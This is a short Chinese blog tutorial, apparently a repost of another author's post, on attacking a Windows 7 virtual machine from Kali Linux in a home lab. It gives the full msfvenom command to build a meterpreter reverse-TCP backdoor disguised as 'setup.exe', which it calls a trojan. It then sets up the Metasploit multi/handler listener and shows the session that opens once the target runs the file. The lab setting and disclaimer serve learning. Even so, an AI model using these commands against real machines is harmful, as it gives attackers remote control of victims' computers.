admin 管理员组

文章数量: 887021

Kali环境下渗透目标(win7)虚拟机

注:(此文章,是我看了CSDN上另一位博主的文章,我在自己在电脑上实验了一遍的结果。另外,本文仅供学习交流。用来做非法之事,本人概不负责)

准备:
1,在电脑上安装VMware,并下载安装虚拟机kali;虚拟机Windows7
2,要使两台虚拟机相互之间能ping通。在两台机子都被启动以后,在其中一台电脑的终端命令界面,输入 ping (另一虚拟机ip地址)。
如果无法ping通,点击菜单栏里的编辑,在下拉列表中点击‘虚拟网络编辑器‘。查看两虚拟机是否在同一网卡内,若不在则修改至同一网卡。

具体步骤一:要想植入木马病毒,前提条件是要先有这么一个木马,所以,第一步就是建立木马病毒。这里需要利用Metaspolit工具。(metaspolit 是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。)

Kali虚拟机 ip:192.168.90.128 Windows虚拟机 ip:192.168.90.129
查看IP命令:kali—ip add ; windows—ipconfig

1,建立一个名为setup.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.90.128 LPORT=5050 -f exe -o setup.exe*

#(建立的文件可在root里面看到)

2、打开msf控制台,加载exploit/multi/handler模块,同时设置**本地主机地址,本地端口

	代码:	
		msfconsole  
        msf > use exploit/multi/handler
        msf exploit(handler) > set lhost 192.168.90.128
        msf exploit(handler) > set lport 5050


以上步骤结束之后,木马就做成功了,如果把渗透比作钓鱼,鱼饵已经有了,剩下的就是让目标发现鱼饵并吞下。此木马只要目标主机点击之后就会被激活运行。

在Windows7虚拟机上点击并运行setup.exe

3、开始执行渗透攻击并监听

run

鱼咬钩了,之后就是捞上来
4、后门程序反向连接到msf,msf发起第二次攻击(开始渗透),然后客户端(后门程序)连接到服务端(msf)。

输入sysinfo可查看目标机子的大致情况。 输入help可查看具体命令。

本文标签: 虚拟机 目标 环境 kali